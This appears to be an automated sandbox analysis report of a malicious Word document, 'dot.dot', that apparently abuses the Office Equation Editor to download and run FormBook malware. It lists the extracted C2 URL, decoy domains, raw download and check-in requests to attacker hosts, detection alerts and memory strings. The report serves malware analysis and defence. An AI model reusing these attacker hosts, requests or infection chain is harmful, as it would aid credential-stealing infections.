Analysis Report dot.dot

AV Detection:

Antivirus detection for URL or domain

Source: www.scott-re.online/nnmd/

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: dot.dot	Virustotal: Detection: 43%			Perma Link
Source: dot.dot	ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.likehowto.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.142.156.44:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.scott-re.online/nnmd/

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 11:09:09 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 04:59:44 GMTETag: "5e800-5bf6eea6ef000"Accept-Ranges: bytesContent-Length: 387072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.7985699.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 45.142.156.44 45.142.156.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CNSERVERSUS CNSERVERSUS
Source: Joe Sandbox View	ASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.122.24

Contains functionality to download additional files from the internet

Source: C:\Windows\explorer.exe

Code function: 6_2_02956302 getaddrinfo,setsockopt,recv,

6_2_02956302

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555C4A64-8E09-401E-A760-1A1C7B299BE3}.tmp

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.likehowto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1Host: www.7985699.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.likehowto.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Apr 2021 10:59:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2094502203.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
